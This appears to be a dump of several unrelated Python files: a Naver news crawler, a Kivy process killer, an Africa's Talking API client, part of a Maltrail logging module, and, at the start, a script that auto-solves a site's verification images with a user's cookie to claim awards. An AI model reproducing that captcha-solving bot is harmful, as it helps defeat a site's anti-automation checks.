outRec=cav.create_rectangle(5,5,300,20,outline="green",width=1)
global fillRec
fillRec=cav.create_rectangle(5,5,5,20,outline="",width=0,fill="green")
cav.pack()
win.mainloop()
def updatePb(cur,allpro):
cav.coords(fillRec,(5,5,6+(cur/allpro)*295,20))
win.update()
def update_in_time(ifstu):
t1=threading.Thread(target=statuswin,args=())
t2=threading.Thread(target=deathloop,args=(ifstu,))
t1.start()
t2.start()
t1.join()
t2.join()
def deathloop(is_study):
init_ck=stv
while True:
timeS,timeE=getCurrentTask(init_ck)
if int(time.time())<timeE:
print('领取时间戳:%d,当前时间戳:%d,等待%d秒' % (timeE,time.time(),timeE-int(time.time())+1))
statusText.config(state=tk.NORMAL)
statusText.insert(tk.END,'领取时间戳:%d,当前时间戳:%d,等待%d秒\n' % (timeE,time.time(),timeE-int(time.time())+1))
statusText.config(state=tk.DISABLED)
#lbmsg.set('领取时间戳:%d,当前时间戳:%d,等待%d秒' % (timeE,time.time(),timeE-int(time.time())+1))
time.sleep(timeE-int(time.time())+1)
grey_png=Image.open(make_req(init_ck)).convert('L')
#try:
arr=np.array(grey_png)
zomap=shadow_split(arr)
gc_r,gc_c=center_of_gravity(zomap)
global mov_c
global mov_r
mov_r=gc_r-20
mov_c=gc_c-60
new_map=cp.deepcopy(zomap)
new_png=cp.deepcopy(arr)
for ii in range(len(new_map)):
for jj in range(len(new_map[ii])):
new_map[ii][jj]=0
new_png[ii][jj]=0
for ii in range(len(zomap)):
for jj in range(len(zomap[ii])):
if ii-mov_r>=40 or jj-mov_c>=120:
continue
new_map[ii-mov_r][jj-mov_c]=zomap[ii][jj]
new_png[ii-mov_r][jj-mov_c]=arr[ii][jj]
ig=Image.fromarray(new_map)
new_map=np.array(ig.resize((960,320)))
new_img,dg=rotate_check(new_map)
revis=scan_dark_pixs(new_img)
revi=new_img.crop(revis)
processed_gp=Image.fromarray(new_png).resize((960,320)).rotate(dg).crop(revis)
rou_dot_map=check_dot(np.array(processed_gp))
rdm_img=Image.fromarray(rou_dot_map).crop(scan_dark_pixs(Image.fromarray(rou_dot_map)))
global dislist
distinguish_result,dislist,is_okay=compare_study_and_example(np.array(rdm_img))
print('识别计算结果为:',end='')
print(distinguish_result)
# except:
# print('程序出错,开始备份错误图片文件')
# debugi=0
# for debugi in range(20):
# if os.path.exists(os.path.dirname(sys.path[0])+'\\BUG_%d' % debugi):
# continue
# else:
# os.system('ren temp.png BUG_%d.png' % debugi)
# break
# distinguish_result=39
# is_okay=0
getAward(init_ck,distinguish_result,np.array(rdm_img),dislist,is_study,is_okay,timeS,timeE)
#GUI模块
def subm1():
print(ent)
global stv
stv=ent.get('1.0',tk.END)[:-1]
rt.destroy()
#print(stv.get())
global rt2
rt2=tk.Tk()
rt2.title("请确认是否开启学习开关")
rt2.geometry('300x100')
bb=tk.Button(rt2,text='启用学习开关',width=15,height=2,command=bton).pack()
bbb=tk.Button(rt2,text='禁用学习开关',width=15,height=2,command=btoff).pack()
rt2.mainloop()
def bton():
rt2.destroy()
update_in_time(1)
def btoff():
rt2.destroy()
update_in_time(0)
rt=tk.Tk()
#stv=tk.StringVar()
rt.title("GUI测试:请输入您的cookie【仅用于申请验证码】:")
rt.geometry('400x250')
ent=tk.Text(rt,width=50,height=15)
ent.pack()
bt=tk.Button(rt,text='确定',width=15,height=2,command=subm1).pack()
rt.mainloop()
#is_study=int(input('是否开启学习开关?输入1以开启'))
|
articlecrawler.py
|
from time import sleep
from bs4 import BeautifulSoup
from exceptions import *
from multiprocessing import Process
from articleparser import ArticleParser
import os
import calendar
import re
import requests
import pymongo
import urllib.request
from settings import *
class ArticleCrawler(object):
def __init__(self):
self.parser = ArticleParser()
self.category = {'정치': 100, '경제': 101, '사회': 102, '생활문화': 103,'세계':104, 'IT과학': 105}
self.selected_category = []
self.date = {'start_year': 0, 'end_year': 0, 'end_month': 0}
def set_category(self, *args):
for key in args:
if self.category.get(key) is None:
raise InvalidCategory(key)
else:
self.selected_category = args
def set_date_range(self, start_year, end_year, end_month):
args = [start_year, end_year, end_month]
if start_year > end_year:
raise InvalidYear(start_year, end_year)
if end_month < 1 or end_month > 12:
raise InvalidMonth(end_month)
for key, date in zip(self.date, args):
self.date[key] = date
print(self.date)
def make_news_page_url(self, category_url, start_year, last_year, start_month, last_month):
maked_url = []
final_startmonth = start_month
final_lastmonth = last_month
for year in range(start_year, last_year + 1):
if year != last_year:
start_month = 1
last_month = 12
else:
start_month = final_startmonth
last_month = final_lastmonth
for month in range(start_month, last_month + 1):
for month_day in range(1, calendar.monthrange(year, month)[1] + 1):
url = category_url
if len(str(month)) == 1:
month = "0" + str(month)
if len(str(month_day)) == 1:
month_day = "0" + str(month_day)
url = url + str(year) + str(month) + str(month_day)
final_url = url # page 날짜 정보만 있고 page 정보가 없는 url 임시 저장
# totalpage는 네이버 페이지 구조를 이용해서 page=1000으로 지정해 totalpage를 알아냄
# page=1000을 입력할 경우 페이지가 존재하지 않기 때문에 page=totalpage로 이동 됨
totalpage = self.parser.find_news_totalpage(final_url + "&page=1000")
for page in range(1, totalpage + 1):
url = final_url # url page 초기화
url = url + "&page=" + str(page)
maked_url.append(url)
return maked_url
def crawling(self, category_name):
# MultiThread PID
print(category_name + " PID: " + str(os.getpid()))
# 안되면 울거다
file_name = 'Article_'+str(self.category[category_name])
conn = pymongo.MongoClient(
'mongodb://%s:%s@%s:%s/' % (MONGODB_USERID, MONGODB_PASSWORD, MONGODB_HOST, MONGODB_PORT))
print(conn)
db = conn.get_database(MONGODB_DATABASE)
collection = db[file_name]
# 기사 URL 형식
url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(
self.category.get(category_name)) + "&date="
# start_year년 1월 ~ end_year의 end_mpnth 날짜까지 기사를 수집합니다.
final_urlday = self.make_news_page_url(url, self.date['start_year'], self.date['end_year'], 1,
self.date['end_month'])
print(category_name + " Urls are generated")
print(final_urlday)
print(len(final_urlday))
print("크롤링 시작")
for URL in final_urlday:
regex = re.compile("date=(\d+)")
news_date = regex.findall(URL)[0]
request = requests.get(URL)
document = BeautifulSoup(request.content, 'html.parser')
tag_document = document.find_all('dt', {'class': 'photo'})
post = []
row = 0
for tag in tag_document:
post.append(tag.a.get('href')) # 해당되는 page에서 모든 기사들의 URL을 post 리스트에 넣음
for content_url in post: # 기사 URL
# 크롤링 대기 시간
sleep(0.01)
# 기사 HTML 가져옴
request_content = requests.get(content_url)
document_content = BeautifulSoup(request_content.content, 'html.parser')
try:
# 기사 제목 가져옴
tag_headline = document_content.find_all('h3', {'id': 'articleTitle'}, {'class': 'tts_head'})
text_headline = '' # 뉴스 기사 제목 초기화
text_headline = text_headline + self.parser.clear_headline(str(tag_headline[0].find_all(text=True)))
if not text_headline: # 공백일 경우 기사 제외 처리
continue
# 기사 본문 가져옴
tag_content = document_content.find_all('div', {'id': 'articleBodyContents'})
text_sentence = '' # 뉴스 기사 본문 초기화
text_sentence = text_sentence + self.parser.clear_content(str(tag_content[0].find_all(text=True)))
if not text_sentence: # 공백일 경우 기사 제외 처리
continue
# 기사 언론사 가져옴
tag_company = document_content.find_all('meta', {'property': 'me2:category1'})
text_company = '' # 언론사 초기화
text_company = text_company + str(tag_company[0].get('content'))
if not text_company: # 공백일 경우 기사 제외 처리
continue
# 기사 이미지 가져옴
tag_image = document_content.find_all('span', {'class': 'end_photo_org'})
image_url = '' # 이미지 초기화
image_url = image_url + str(tag_image[0].find('img')['src'])
image_path = "images/"+file_name+"_"+str(row)+"_"+str(news_date)+'.png'
urllib.request.urlretrieve(image_url, image_path)
row = row + 1
if not image_url: # 공백일 경우 기사 제외 처리
continue
collection.insert_one({"data": {
"headline": text_headline,
"content": text_sentence,
"company": text_company,
"image": image_path
}})
except Exception as ex:
pass
def start(self):
# MultiProcess 크롤링 시작
for category_name in self.selected_category:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
if __name__ == "__main__":
Crawler = ArticleCrawler()
Crawler.set_category("정치")
Crawler.set_date_range(2018, 2018, 1)
Crawler.start()
|
main.py
|
from psutil import process_iter, NoSuchProcess, cpu_count, AccessDenied
from kivymd.app import MDApp
from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
from os.path import join as p_join
from kivy.clock import mainthread
from time import sleep
from threading import Thread, Lock
from kivy.metrics import dp
from utils import icon_path, this_dir # noqa
from widgets import MiniProcessCell, Navigator # noqa
from kivy.config import Config
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
del Config
Builder.load_file(p_join(this_dir, 'main.kv'))
del Builder
cpus = cpu_count()
del cpu_count
processes = {proc.pid: proc for proc in process_iter(['name', 'exe'])}
processes_lock = Lock()
def update_processes():
global processes
temp_processes = {}
processes_lock.acquire()
for proc in process_iter(['name', 'exe']):
pid = proc.pid
temp_processes[pid] = proc
proc_now = processes.get(pid)
if (proc_now is None) or (proc.info['name'] != proc_now.info['name']):
processes[pid] = proc
update_label = False
for pid in [*processes]:
if pid not in temp_processes:
app.select_row(pid, False, label=False)
if pid in app.current_selection:
app.current_selection.remove(pid)
del processes[pid]
update_label = True
if update_label:
app.update_selection_label()
processes_lock.release()
def always_updating_processes():
while True:
update_processes()
sleep(1)
class Main(Screen):
def __init__(self, **kw):
self.data_lock = Lock()
self.scroll_lock = Lock()
self.answer_lock = Lock()
self.answered = self.ordered = False
self.visible_range = range(0)
self.special_order_cells = []
self.order_cells = []
self.answerers = []
self.last_search = None
self.order_by = order_by = Killer.killer_config["order_by"]
if order_by == "proc_name":
self.key_func = lambda c: c["proc_name"].lower()
else:
self.key_func = lambda c: c[order_by] # overwrote
self.reverse = Killer.killer_config["desc"]
super().__init__(**kw)
def on_scroll_start(instance, event):
if not self.scroll_lock.locked():
if event.is_mouse_scrolling:
pos = instance.scroll_y
if pos >= 1 or pos <= 0:
return
Thread(target=self.scroll_lock.acquire, daemon=True).start()
def on_scroll_stop(*args): # noqa
if self.scroll_lock.locked():
Thread(target=self.scroll_lock.release).start()
def on_touch_up(*args): # noqa
if self.scroll_lock.locked():
Thread(target=self.scroll_lock.release).start()
self.ids.rv.bind(on_scroll_start=on_scroll_start,
on_scroll_stop=on_scroll_stop,
on_touch_up=on_touch_up
)
@mainthread
def assign_data(self, data):
self.ids.rv.data = data
@mainthread
def set_multiple_select(self, active):
self.ids.multiple_select.active = active
def new_special_order_cell(self, proc, proc_pid, proc_name, cpu, mem):
proc_cpu = proc_mem = 0.0
proc_exe = proc.info['exe']
proc_icon = icon_path(proc_exe, proc_name)
try:
if cpu:
proc_cpu = proc.cpu_percent(app.refresh_interval) / cpus
if mem:
proc_mem = proc.memory_percent()
except NoSuchProcess:
pass
cell = {"proc_pid": proc_pid,
"proc_icon": proc_icon,
"proc_name": proc_name,
"proc_cpu": proc_cpu,
"proc_mem": proc_mem}
self.special_order_cells.append(cell)
def correct_special_order_cell(self, index, cpu, mem):
cell = self.special_order_cells[index]
proc_pid = cell['proc_pid']
proc = processes[proc_pid]
try:
if cpu:
cell["proc_cpu"] = proc.cpu_percent(app.refresh_interval) / cpus
if mem:
cell["proc_mem"] = proc.memory_percent()
except NoSuchProcess:
pass
def special_order_update_data(self):
search = self.ids.search_field.text.lower()
cpu = self.order_by == "proc_cpu"
mem = self.order_by == "proc_mem"
self.special_order_cells = []
singles = []
correct_singles = []
processes_lock.acquire()
for proc_pid, proc in processes.items():
proc_name = proc.info['name']
if (not search) or (search in f'{proc_pid}{proc_name.lower()}'):
new_special_order_cell_thread = Thread(target=self.new_special_order_cell,
args=(proc, proc_pid, proc_name, cpu, mem))
new_special_order_cell_thread.start()
singles.append(new_special_order_cell_thread)
for single in singles:
single.join()
self.special_order_cells = sorted(self.special_order_cells, key=self.key_func, reverse=self.reverse)
data_max = len(self.special_order_cells)
for index in self.visible_range:
if index >= data_max:
break
correct_special_order_cell_thread = \
Thread(target=self.correct_special_order_cell, args=(index, not cpu, not mem))
correct_special_order_cell_thread.start()
correct_singles.append(correct_special_order_cell_thread)
for single in correct_singles:
single.join()
processes_lock.release()
self.update_data_base(self.special_order_cells)
def correct_order_cell(self, index, cpu=True, mem=True):
cell = self.order_cells[index]
proc_pid = cell['proc_pid']
proc = processes[proc_pid]
try:
with proc.oneshot():
if cpu:
cell["proc_cpu"] = proc.cpu_percent(app.refresh_interval) / cpus
if mem:
cell["proc_mem"] = proc.memory_percent()
except NoSuchProcess:
pass
def order_update_data(self):
search = self.ids.search_field.text.lower()
self.order_cells = []
correct_singles = []
processes_lock.acquire()
for proc_pid, proc in processes.items():
proc_name = proc.info["name"]
if (not search) or (search in f'{proc_pid}{proc_name.lower()}'):
proc_exe = proc.info["exe"]
proc_icon = icon_path(proc_exe, proc_name)
cell = {"proc_pid": proc_pid,
"proc_icon": proc_icon,
"proc_name": proc_name,
"proc_cpu": 0.0,
"proc_mem": 0.0}
self.order_cells.append(cell)
self.order_cells = sorted(self.order_cells, key=self.key_func, reverse=self.reverse)
data_max = len(self.order_cells)
if self.last_search is not None and len(self.ids.search_field.text) < len(self.last_search):
self.update_data_base(self.order_cells)
self.last_search = None
for index in self.visible_range:
if index >= data_max:
break
correct_order_cell_thread = Thread(target=self.correct_order_cell, args=(index, True, True))
correct_order_cell_thread.start()
correct_singles.append(correct_order_cell_thread)
for single in correct_singles:
single.join()
processes_lock.release()
self.update_data_base(self.order_cells)
def first_update_data(self):
order_cells = []
processes_lock.acquire()
for proc_pid, proc in processes.items():
proc_name = proc.info["name"]
proc_exe = proc.info["exe"]
proc_icon = icon_path(proc_exe, proc_name)
cell = {"proc_pid": proc_pid,
"proc_icon": proc_icon,
"proc_name": proc_name,
"proc_cpu": 0.0,
"proc_mem": 0.0}
order_cells.append(cell)
processes_lock.release()
order_cells = sorted(order_cells, key=self.key_func, reverse=self.reverse)
self.assign_data(order_cells)
def update_data_base(self, new_data):
if not self.answer_lock.locked():
if not self.answered and not self.ordered:
with self.data_lock:
with self.scroll_lock:
self.assign_data(new_data)
else:
self.answered = self.ordered = False
def always_updating_data(self):
while True:
if self.order_by in {"proc_cpu", "proc_mem"}:
self.special_order_update_data()
else:
self.order_update_data()
def order(self, order_by, reverse):
if order_by == "proc_name":
self.key_func = lambda c: c["proc_name"].lower()
else:
self.key_func = lambda c: c[order_by]
self.reverse = reverse
self.order_by = order_by
self.ordered = True
with self.data_lock:
temp_data = sorted(self.ids.rv.data, key=self.key_func, reverse=reverse)
self.assign_data(temp_data)
self.ordered = True
def set_visible_range(self):
rv = self.ids.rv
to_local = rv.to_local
center_x = rv.center_x
get_view_index_at = rv.layout_manager.get_view_index_at
try:
top_pos = to_local(center_x, rv.height)
top_i = get_view_index_at(top_pos)
bottom_pos = to_local(center_x, 0)
bottom_i = get_view_index_at(bottom_pos)
self.visible_range = range(top_i, bottom_i + 1)
except TypeError:
pass # random kivy error
def always_setting_visible_range(self):
while True:
self.set_visible_range()
sleep(0.1)
def fast_answer(self, search):
if search == "":
return
if not self.answer_lock.locked():
from threading import Event
start_event = Event()
Thread(target=self.answerers_control, args=(start_event,)).start()
else:
start_event = None
fast_thread = Thread(target=self.fast_answer_base, args=(search,))
fast_thread.start()
self.answerers.append(fast_thread)
if start_event is not None:
start_event.set()
def answerers_control(self, start_event):
self.answer_lock.acquire()
start_event.wait()
while self.answerers:
fast_thread = self.answerers.pop(0)
fast_thread.join()
self.answered = True
self.answer_lock.release()
def fast_answer_base(self, search):
temp_data = []
for cell in self.ids.rv.data:
if search in f'{cell["proc_pid"]}{cell["proc_name"].lower()}':
temp_data.append(cell)
self.assign_data(temp_data)
self.last_search = search
class Killer(MDApp):
from kivy.properties import StringProperty, ListProperty, NumericProperty, BooleanProperty
version = StringProperty(None, allownone=True)
update = StringProperty(None, allownone=True)
current_selection = ListProperty()
from json import load
killer_config_file = p_join(this_dir, 'killer_config.json')
with open(killer_config_file, "r") as killer_read_file:
killer_config = load(killer_read_file)
del killer_read_file, load
zooms = {'0.5x': (32, 'Body2'),
'1x': (dp(48), 'Body1')}
z = killer_config['zoom']
zoom = StringProperty(z)
proc_height = NumericProperty(zooms[z][0])
proc_style = StringProperty(zooms[z][1])
del z
dark = BooleanProperty(killer_config['dark'])
desc = BooleanProperty(killer_config['desc'])
order_by = StringProperty(killer_config['order_by'])
refresh_interval = NumericProperty(killer_config['refresh_interval'])
del StringProperty, ListProperty, NumericProperty, BooleanProperty
@staticmethod
def on_zoom(self, value):
self.proc_height, self.proc_style = self.zooms[value]
Thread(target=self.update_config, args=('zoom', value)).start()
@staticmethod
def on_dark(self, value):
self.theme_cls.theme_style = "Dark" if value else "Light"
Thread(target=self.update_config, args=('dark', value)).start()
@staticmethod
def on_desc(self, value):
Thread(target=self.main.order, args=(self.order_by, value)).start()
Thread(target=self.update_config, args=('desc', value)).start()
@staticmethod
def on_order_by(self, value):
Thread(target=self.main.order, args=(value, self.desc)).start()
Thread(target=self.update_config, args=('order_by', value)).start()
@staticmethod
def on_refresh_interval(self, value):
Thread(target=self.update_config, args=('refresh_interval', value)).start()
def __init__(self, **kwargs):
self.icon = p_join(this_dir, 'icons\\Killer.exe.png')
super().__init__(**kwargs)
self.selection_lock = Lock()
# List[List[Union[str, bool, Set[str], Set[str]]]]
self.selection_control = []
self.navigator = Navigator()
self.main = Main()
self.navigator.ids.sm.add_widget(self.main)
self.theme_cls.theme_style = "Dark" if self.dark else "Light"
def update_config(self, key, value):
from json import dump
self.killer_config[key] = value
with open(self.killer_config_file, "w") as write_file:
dump(self.killer_config, write_file)
def build(self):
return self.navigator
def on_start(self):
self.main.first_update_data()
from kivy.clock import Clock
Clock.schedule_once(self.search_focus)
Thread(target=self.main.always_updating_data, daemon=True).start()
Thread(target=self.main.always_setting_visible_range, daemon=True).start()
Thread(target=always_updating_processes, daemon=True).start()
Thread(target=self.always_selecting, daemon=True).start()
def check_for_updates(self, state):
if state == "open":
Thread(target=self.check_for_updates_base).start()
def check_for_updates_base(self):
if self.version is None:
from utils import proc_version_tag, this_pid # noqa
self.version = proc_version_tag(processes[this_pid])
if self.version is not None:
from utils import update_to # noqa
self.update = update_to(self.version, 'ntaraujo', 'killer')
def search_focus(*args):
args[0].main.ids.search_field.focus = True
def always_selecting(self):
while True:
if len(self.main.ids.rv.data) == 0:
self.main.set_multiple_select(False)
sleep(1)
continue
state = True
self.selection_lock.acquire()
self.main.data_lock.acquire()
for cell in self.main.ids.rv.data:
if cell["proc_pid"] not in self.current_selection:
state = False
break
self.main.data_lock.release()
self.main.set_multiple_select(state)
self.selection_lock.release()
sleep(1)
def update_selection_label(self):
selection_strings = []
lonely_ones = []
searches = []
exceptions = []
# _search: what was the search when general checkbox was clicked, or empty if it wasn't clicked
# _check: if general checkbox was clicked
# _added: related PIDs
# _removed: related PIDs but unmarked
for _search, _check, _added, _removed in self.selection_control:
if _check:
searches.append(_search)
for pid in _removed:
if pid not in exceptions:
exceptions.append(pid)
else:
for one_pid in _added:
lonely_ones.append(one_pid)
lonely_ones_amount = len(lonely_ones)
if lonely_ones_amount:
lonely_ones = sorted(lonely_ones)
last_lonely = lonely_ones[-1]
if lonely_ones_amount == 1:
selection_strings.append(f'process {last_lonely}')
else:
lonely_string = "processes " + ', '.join([str(lo) for lo in lonely_ones])
lonely_string = lonely_string.replace(f', {last_lonely}', f' and {last_lonely}')
selection_strings.append(lonely_string)
searches_amount = len(searches)
if searches_amount:
searches = sorted(searches)
last_search = searches[-1]
if searches_amount == 1:
if last_search == "":
selection_strings.append("all")
else:
selection_strings.append(f'all with "{last_search}"')
else:
search_string = 'all with "{}"'.format('" or "'.join(searches))
selection_strings.append(search_string)
exceptions_amount = len(exceptions)
if exceptions_amount:
exceptions = sorted(exceptions)
last_exception = exceptions[-1]
if exceptions_amount == 1:
selection_strings.append(f"except process {last_exception}")
else:
exception_string = 'except processes ' + ', '.join([str(ex) for ex in exceptions])
exception_string = exception_string.replace(f', {last_exception}', f' and {last_exception}')
selection_strings.append(exception_string)
if selection_strings:
self.main.ids.selection_label.text = f'Selected: {"; ".join(selection_strings)} '
else:
self.main.ids.selection_label.text = ''
def select_row(self, pid, active, instance=None, label=True):
if active and pid not in self.current_selection:
self.current_selection.append(pid)
changed = False
for _search, _check, _added, _removed in self.selection_control:
if pid in _removed:
# pid was related to a search before and was unmarked, now its being remarked
_removed.remove(pid)
changed = True
if not changed: # pid was not related to a previous search
self.selection_control.append(["", False, {pid}, set()]) # _search is "" bcs doesn't matter
elif not active and pid in self.current_selection:
self.current_selection.remove(pid)
for _search, _check, _added, _removed in [*self.selection_control]:
if pid in _added:
_removed.add(pid)
if not _added - _removed:
# all related PIDs were unmarked, doesn't matter _check
# the set _removed is still linked bcs there wasn't a deepcopy, so:
self.selection_control.remove([_search, _check, _added, _removed])
else:
return
if instance is not None:
instance.check_anim_in.cancel(instance)
instance.check_anim_out.start(instance)
if label:
self.update_selection_label()
def select_rows(self, active):
if active:
pids = set()
self.main.data_lock.acquire()
for cell in self.main.ids.rv.data:
pid = cell['proc_pid']
if pid not in self.current_selection:
self.current_selection.append(pid)
pids.add(pid)
self.main.data_lock.release()
search = self.main.ids.search_field.text.lower()
need_to_add = True
for _search, _check, _added, _removed in [*self.selection_control]:
# selected all
# selected a group which includes all _added bcs _search was more specific or as specific as
surely_include_all = not search or (_check and search in _search)
# selected a pid lonely selected before
iter_include_all = surely_include_all or (not _check and not _added.difference(pids))
if iter_include_all:
self.selection_control.remove([_search, _check, _added, _removed])
elif _removed:
# if there was exceptions
for pid in pids:
if pid in _removed:
# if a marked pid was in these exceptions
_removed.remove(pid)
if _check and _search in search and not iter_include_all:
# if a previous search was less specific than, or as specific as now,
# and was not removed, it includes all PIDs and there is no need to be redundant
need_to_add = False
if need_to_add:
self.selection_control.append([search, True, pids, set()])
else:
self.current_selection = []
self.selection_control = []
self.update_selection_label()
def kill_selected(self):
from utils import kill # noqa
fails = []
with processes_lock:
for pid in self.current_selection:
proc = processes[pid]
if not kill(proc):
fails.append(proc)
self.show_fails(fails)
def kill_selected_and_children(self):
from utils import kill_proc_tree # noqa
fails = []
with processes_lock:
for pid in self.current_selection:
fails.extend(kill_proc_tree(processes[pid]))
self.show_fails(fails)
@mainthread
def show_fails(self, fails):
if len(fails) == 0:
return
items = []
cell = MiniProcessCell()
cell.proc_name = "Process Name"
cell.proc_pid = "PID"
cell.proc_user = "Owner"
items.append(cell)
for proc in fails:
cell = MiniProcessCell()
cell.proc_name = proc.info["name"]
cell.proc_icon = icon_path('', cell.proc_name)
cell.proc_pid = str(proc.pid)
cell.little_font = dp(10)
try:
cell.proc_user = proc.username()
except AccessDenied:
pass
except NoSuchProcess:
continue
finally:
items.append(cell)
leni = len(items)
if leni == 1:
return
if leni > 2:
title = "Was not possible to kill the following processes:"
else:
title = "Was not possible to kill the following process:"
from kivymd.uix.dialog import MDDialog
from kivymd.uix.button import MDRaisedButton
fails_dialog = MDDialog(
title=title,
items=items,
type="simple",
buttons=[MDRaisedButton(text="OK")]
)
fails_dialog.ids.title.color = self.theme_cls.opposite_bg_normal
fails_dialog.open()
app = Killer()
if __name__ == '__main__':
app.run()
|
Service.py
|
import re
import threading
import requests
def validate_currency(currency_str):
return len(currency_str) == 3
def validate_amount(amount_str):
try:
return float(amount_str)
except ValueError:
return False
def validate_phone(phone_str):
try:
return re.match('^\+\d{1,3}\d{3,}$', phone_str)
except ValueError:
return False
def validate_keys(test_dict, valid_keys_set):
if set(test_dict.keys()) == valid_keys_set:
return True
return False
class AfricasTalkingException(Exception):
pass
class Service(object):
def __init__(self, username, api_key):
if type(username) is not str:
raise RuntimeError('username has to be of type str.')
if type(api_key) is not str:
raise RuntimeError('api_key has to be of type str.')
self._PRODUCTION_DOMAIN = 'africastalking.com'
self._SANDBOX_DOMAIN = 'sandbox.africastalking.com'
self._username = username
self._api_key = api_key
self._headers = {
'Accept': 'application/json',
'User-Agent': 'africastalking-python/2.0.0',
'ApiKey': self._api_key
}
self._baseUrl = 'https://api.' + self._PRODUCTION_DOMAIN
self._init_service()
def _is_sandbox(self):
return self._username == 'sandbox'
def _make_url(self, path):
return self._baseUrl + path
def _init_service(self):
raise NotImplementedError
@staticmethod
def __make_get_request(url, headers, data, params, callback=None):
res = requests.get(
url=url,
headers=headers,
params=params,
data=data
)
if callback is None or callback == {}:
return res
else:
callback(res)
@staticmethod
def __make_post_request(url, headers, data, params, callback=None):
res = requests.post(
url=url,
headers=headers,
params=params,
data=data,
)
if callback is None or callback == {}:
return res
else:
callback(res)
def _make_request(self, url, method, headers, data, params, callback=None):
method = method.upper()
if callback is None:
if method == 'GET':
res = self.__make_get_request(url=url, headers=headers, data=data, params=params)
elif method == 'POST':
res = self.__make_post_request(url=url, headers=headers, data=data, params=params)
else:
raise AfricasTalkingException('Unexpected HTTP method: ' + method)
if 200 <= res.status_code < 300:
if res.headers.get('content-type') == 'application/json':
return res.json()
else:
return res.text
else:
raise AfricasTalkingException(res.text)
elif not callable(callback):
raise RuntimeError('callback has to be callable. e.g. a function')
else:
def cb(response):
if 200 <= response.status_code < 300:
if response.headers.get('content-type') == 'application/json':
callback(None, response.json())
else:
callback(None, response.text)
else:
callback(AfricasTalkingException(response.text), None)
if method == 'GET':
_target = self.__make_get_request
elif method == 'POST':
_target = self.__make_post_request
else:
raise AfricasTalkingException('Unexpected HTTP method: ' + method)
thread = threading.Thread(target=_target, args=(url, headers, data, params, cb))
thread.start()
return thread
class APIService(Service):
def __init__(self, username, api_key):
super(APIService, self).__init__(username, api_key)
def _init_service(self):
self._baseUrl = 'https://api.'
if self._is_sandbox():
self._baseUrl += self._SANDBOX_DOMAIN
else:
self._baseUrl += self._PRODUCTION_DOMAIN
|
log.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
import os
import signal
import socket
import SocketServer
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import TRAILS_FILE
from core.settings import VERSION
from core.ignore import ignore_event
_condensed_events = {}
_condensing_thread = None
_condensing_lock = threading.Lock()
_thread_data = threading.local()
def create_log_directory():
if not os.path.isdir(config.LOG_DIR):
if check_sudo() is False:
exit("[!] please rerun with sudo/Administrator privileges")
os.makedirs(config.LOG_DIR, 0755)
print("[i] using '%s' for log storage" % config.LOG_DIR)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
retval = None
localtime = time.localtime(sec)
_ = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
if not reuse:
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
retval = os.open(_, flags)
else:
if _ != getattr(_thread_data, "event_log_path", None):
if getattr(_thread_data, "event_log_handle", None):
try:
os.close(_thread_data.event_log_handle)
except OSError:
pass
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
_thread_data.event_log_path = _
_thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)
retval = _thread_data.event_log_handle
return retval
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
if not hasattr(_thread_data, "error_log_handle"):
_ = os.path.join(config.LOG_DIR, "error.log")
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_ERROR_LOG_PERMISSIONS)
_thread_data.error_log_path = _
_thread_data.error_log_handle = os.open(_thread_data.error_log_path, flags)
return _thread_data.error_log_handle
def safe_value(value):
retval = str(value or '-')
if any(_ in retval for _ in (' ', '"')):
retval = "\"%s\"" % retval.replace('"', '""')
return retval
def flush_condensed_events():
while True:
time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
with _condensing_lock:
for key in _condensed_events:
condensed = False
events = _condensed_events[key]
first_event = events[0]
condensed_event = [_ for _ in first_event]
for i in xrange(1, len(events)):
current_event = events[i]
for j in xrange(3, 7): # src_port, dst_ip, dst_port, proto
if current_event[j] != condensed_event[j]:
condensed = True
if not isinstance(condensed_event[j], set):
condensed_event[j] = set((condensed_event[j],))
condensed_event[j].add(current_event[j])
if condensed:
for i in xrange(len(condensed_event)):
if isinstance(condensed_event[i], set):
condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))
log_event(condensed_event, skip_condensing=True)
_condensed_events.clear()
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
global _condensing_thread
if _condensing_thread is None:
_condensing_thread = threading.Thread(target=flush_condensed_events)
_condensing_thread.daemon = True
_condensing_thread.start()
try:
sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
if ignore_event(event_tuple):
return
if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS): # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
if not skip_write:
localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
if not skip_condensing:
if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
with _condensing_lock:
key = (src_ip, trail)
if key not in _condensed_events:
_condensed_events[key] = []
_condensed_events[key].append(event_tuple)
return
current_bucket = sec / config.PROCESS_COUNT
if getattr(_thread_data, "log_bucket", None) != current_bucket: # log throttling
_thread_data.log_bucket = current_bucket
_thread_data.log_trails = set()
else:
